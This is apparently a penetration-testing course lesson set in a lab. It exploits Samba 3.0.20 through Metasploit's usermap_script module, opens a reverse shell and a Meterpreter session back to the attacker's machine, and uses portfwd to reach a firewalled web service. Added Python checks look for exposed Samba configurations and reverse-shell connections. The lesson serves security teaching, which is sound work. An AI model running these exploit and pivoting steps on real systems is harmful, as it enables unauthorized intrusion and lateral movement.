Fundamentals of Penetration Testing

Continuation of the attack on other services

Medium
20 min

Next, we will practice how to use an existing connection to create new connections to services that are not directly exposed to the attacker. In other words, let's see how attackers typically move around the network when they manage to gain a foothold.

Start the exercise below and repeat the steps afterwards.

continuing the attack

Exploiting Vulnerability

Let's start with a traditional nmap scan and check the available services. (You can do this either with Metasploit's db_nmap command or separately with the nmap tool.)

root@figwusebrs-student:/# nmap -sV -Pn 10.0.2.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 22:16 UTC
Nmap scan report for 10.0.2.225
Host is up (0.000085s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 15.59 seconds

The first scan shows that the open ports belong to the Samba service.

Samba is open source software that provides file and printer sharing between computers on the same network.

This is not yet enough for us to start looking for plausible vulnerabilities in the service. Let's perform additional scans using the scripts bundled with nmap.

root@figwusebrs-student:/# nmap -A -p139,445 -Pn 10.0.2.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 22:22 UTC
Nmap scan report for 10.0.2.225
Host is up (0.000065s latency).

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20 (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS Fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops

Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20)
| Computer name: figwusebrs-target
| NetBIOS computer name:
| Domain name:
| FQDN: figwusebrs-target
|_ System time: 2023-10-10T18:23:21-04:00
|_clock-skew: mean: 2h00m02s, deviation: 2h49m45s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Now nmap reveals that the target runs Samba version 3.0.20. Let's open Metasploit in the usual way and see whether its module database contains any exploits for this version.

msf6 > search Exploit samba

Matching Modules
================

   # Name Disclosure Date Rank Check Description
   - ---- --------------- ---- ----- -----------
   0 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
   1 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
   2 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
   3 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
   4 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
   5 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
   6 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
   7 exploit/multi/samba/nttrans 2003-04-07 average No

Several interesting and less interesting exploit modules turn up. After investigating a bit more closely (for example by searching Exploit-DB and other sources), we find the "usermap_script" exploit, which looks very interesting. Let's read more about it with the info command.

Description:
  This module exploits a command execution vulnerability in Samba
  versions 3.0.20 through 3.0.25rc3 when using the non-default
  "username map script" configuration option. By specifying a username
  containing shell meta characters, attackers can execute arbitrary
  commands.

  No authentication is needed to exploit this vulnerability since
  this option is used to map usernames prior to authentication!

In short, this exploit module targets a vulnerability in Samba versions 3.0.20 to 3.0.25rc3 that exists when the Samba service is configured with the "username map script" option. This is not the default setting, so the right conditions are required for the vulnerability to be exploitable. We have no way to check this before trying the exploit, which is often the situation. Sometimes you may find yourself in a position where you have to accept the risk of being caught or of breaking the service (for example in a red-teaming exercise or a client project), in the hope that the vulnerability is present. In that case it is important to weigh the options carefully, but luckily we can now safely try different exploits in the Hakatemia environment.
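The two conditions in the module description (the affected version range and the non-default "username map script" option) are exactly what a defender, unlike the attacker, can verify directly on the Samba host. The following check is an added example and not part of the Hakatemia exercise: it takes the version string as input (for example the output of smbd -V), parses a constructed smb.conf sample with a simplified parser that does not follow include directives, and orders release candidates before the final release so that 3.0.25rc3 counts as affected but 3.0.25 does not.

```python
import re

# Affected range quoted in the module description: 3.0.20 through 3.0.25rc3.
VULN_MIN, VULN_MAX = "3.0.20", "3.0.25rc3"
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?$")


def version_key(version):
    """Sortable key; a release candidate orders before the final release of the same number."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version: {version!r}")
    major, minor, patch, rc = (int(g) if g else None for g in m.groups())
    # final release -> (..., 1, 0); rcN -> (..., 0, N) so that 3.0.25rc3 < 3.0.25
    return (major, minor, patch, 1, 0) if rc is None else (major, minor, patch, 0, rc)


def version_in_affected_range(version):
    return version_key(VULN_MIN) <= version_key(version) <= version_key(VULN_MAX)


def parse_smb_conf(text):
    """Minimal smb.conf parser -> {section: {key: value}}. Samba matches parameter names
    case- and whitespace-insensitively, so keys are lower-cased with spaces removed.
    Simplification (assumption of this example): 'include' directives are not followed."""
    sections, current = {"global": {}}, "global"
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower().replace(" ", "")] = value.strip()
    return sections


def assess(version, smb_conf_text):
    """Both conditions from the module description must hold for the host to be exposed."""
    script = parse_smb_conf(smb_conf_text)["global"].get("usernamemapscript")
    affected = version_in_affected_range(version)
    return {"affected_version": affected, "username_map_script": script,
            "exposed": affected and script is not None}


# Constructed sample smb.conf with the non-default option enabled.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; the non-default option the module depends on
   username map script = /etc/samba/scripts/mapusers.sh
"""
```

Running assess("3.0.20", SAMPLE_SMB_CONF) reports the host as exposed; the same configuration on 3.0.26, or the same version without the option, is reported as not exposed.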

Select the exploit module and set the required settings correctly.

msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.0.2.225
RHOSTS => 10.0.2.225
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name Current Setting Required Description
   ---- -------------- -------- -----------
   RHOSTS 10.0.2.225 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT 139 yes The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name Current Setting Required Description
   ---- -------------- -------- -----------
   LHOST 10.0.2.69 yes The listen address (an interface may be specified)
   LPORT 4444 yes The listening port


Exploit target:

   Id Name
   -- ----
   0 Automatic

The payload settings are fine by default. This payload is a reverse shell: Metasploit starts a listener on LHOST:LPORT and, if the exploit succeeds, the target connects back to it. Let's launch the attack.

msf6 exploit(multi/samba/usermap_script) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.0.2.69:4444
msf6 exploit(multi/samba/usermap_script) > [*] Command shell session 1 opened (10.0.2.69:4444 -> 10.0.2.225:34324) at 2023-10-10 22:41:53 +0000

msf6 exploit(multi/samba/usermap_script) >

The attack succeeded and we have a remote command shell on the target system. The exploit -j command runs the exploit module as a background job and leaves any created sessions in the background, without dropping us into the target's command line. We will continue by upgrading the existing command shell session to a Meterpreter session.

msf6 exploit(multi/samba/usermap_script) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > exploit -j
[*] Post module running as background job 1.

[*] Upgrading session ID: 1
msf6 post(multi/manage/shell_to_meterpreter) > [*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.0.2.69:4433
[*] Sending stage (1017704 bytes) to 10.0.2.225
[*] Meterpreter session 2 opened (10.0.2.69:4433 -> 10.0.2.225:52460) at 2023-10-10 22:45:17 +0000
[*] Command stager progress: 100.00% (773/773 bytes)

msf6 post(multi/manage/shell_to_meterpreter) >

Moving around the network

Now we have two sessions open to the target system. Next, let's see what services are in use in the system.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > netstat

Connection list
===============

    Proto Local address Remote address State User Inode PID/Program name
    ----- -------------- ----- ---- ---- ---- ------------
    tcp 0.0.0.0:53 0.0.0.0:* LISTEN 0 0
    tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0
    tcp 0.0.0.0:139 0.0.0.0:* LISTEN 0 0
    tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0
    tcp 10.0.2.225:34324 10.0.2.69:4444 ESTABLISHED 0 0
    tcp 10.0.2.225:52460 10.0.2.69:4433 ESTABLISHED 0 0
    tcp 10.0.2.225:139 10.0.2.69:45567 CLOSE_WAIT 0 0
    tcp :::53 :::* LISTEN 0 0
    udp 0.0.0.0:53 0.0.0.0:* 0 0
    udp 127.0.0.1:33431 0.0.0.0:* 0 0
    udp :::53 :::* 0 0

meterpreter >

The system has a service listening on HTTP port 80, even though our initial nmap scans did not detect it. This is most likely because a firewall between us and the target blocks access to that port. Luckily, we already have a connection to the target system and can use it to reach the service. Next, let's create a tunnel between us and that HTTP service.
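Read from the defender's side, the same netstat listing reveals both things the attacker is about to use: a listener the external scan never reported, and established connections that the file server itself opened (the two reverse shells to ports 4444 and 4433). This is an added example, not part of the exercise: it parses a constructed copy of the listing above and, going slightly beyond the text, also flags TCP port 53 as unseen by the scan.

```python
# Constructed sample modelled on the Meterpreter netstat listing above
# (columns: proto, local address, remote address, state for TCP, user, inode).
NETSTAT_SAMPLE = """\
tcp 0.0.0.0:53 0.0.0.0:* LISTEN 0 0
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0
tcp 0.0.0.0:139 0.0.0.0:* LISTEN 0 0
tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0
tcp 10.0.2.225:34324 10.0.2.69:4444 ESTABLISHED 0 0
tcp 10.0.2.225:52460 10.0.2.69:4433 ESTABLISHED 0 0
tcp 10.0.2.225:139 10.0.2.69:45567 CLOSE_WAIT 0 0
tcp :::53 :::* LISTEN 0 0
udp 0.0.0.0:53 0.0.0.0:* 0 0
"""

# Ports the external nmap scan on this page actually reported as open.
SCAN_SEEN_PORTS = {139, 445}


def split_endpoint(endpoint):
    """'10.0.2.225:34324' -> ('10.0.2.225', 34324); ':::53' -> ('::', 53); port '*' -> None."""
    host, _, port = endpoint.rpartition(":")
    return host, (None if port == "*" else int(port))


def parse_netstat(text):
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("tcp", "udp"):
            continue
        # UDP rows carry no state column, so a state is only read for TCP.
        state = parts[3] if parts[0] == "tcp" and len(parts) > 3 else ""
        rows.append({"proto": parts[0], "local": split_endpoint(parts[1]),
                     "remote": split_endpoint(parts[2]), "state": state})
    return rows


def listening_tcp_ports(rows):
    return sorted({r["local"][1] for r in rows if r["proto"] == "tcp" and r["state"] == "LISTEN"})


def hidden_ports(rows, externally_seen=SCAN_SEEN_PORTS):
    """Listening TCP ports the network scan did not report: candidates for services that
    a firewall filters from the outside but that remain reachable from the host itself."""
    return [p for p in listening_tcp_ports(rows) if p not in externally_seen]


def outbound_connections(rows):
    """ESTABLISHED TCP connections whose local port is not a listener, i.e. connections this
    host opened itself. A file server rarely needs these; here they are the reverse shells."""
    listeners = set(listening_tcp_ports(rows))
    return [(r["local"], r["remote"]) for r in rows
            if r["proto"] == "tcp" and r["state"] == "ESTABLISHED"
            and r["local"][1] not in listeners]
```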

Meterpreter includes a useful command called portfwd.

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -h Help banner.
    -i Index of the port forward entry to interact with (see the "list" command).
    -l Forward: local port to listen on. Reverse: local port to connect to.
    -L Forward: local host to listen on (optional). Reverse: local host to connect to.
    -p Forward: remote port to connect to. Reverse: remote port to listen on.
    -r Forward: remote host to connect to.
    -R Indicates a reverse port forward.

We can use this command to build new tunnels using networks and services available in the compromised system. Let's see this in practice first and then reflect on what exactly happened.

meterpreter > portfwd add -l 8000 -r 0.0.0.0 -p 80
[*] Forward TCP relay created: (local) :8000 -> (remote) 0.0.0.0:80
meterpreter >

The Kali machine is now listening on port 8000.

root@figwusebrs-student:/# netstat -antp |grep 8000
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN 9217/ruby

So we managed to reach the hidden service by using our first connection to the target system. But what exactly happened in the final stage?

The portfwd add command in Meterpreter creates a port forward between a listening port and a destination port. When the command is executed, Metasploit starts listening locally on port 8000. All traffic arriving at this port is carried through the existing Meterpreter session, and the target then connects to the specified destination address (0.0.0.0) and port (80). Because that connection is made from the target's side, 0.0.0.0:80 refers to the target's own HTTP service (on Linux, connecting to 0.0.0.0 reaches the local host).

So when we went to the address 127.0.0.1:8000 on the Kali machine, the listener set up by Metasploit intercepted our traffic and forwarded it through the existing connection to port 80 on the target system.

What text can be found at /secret.html of the HTTP service?
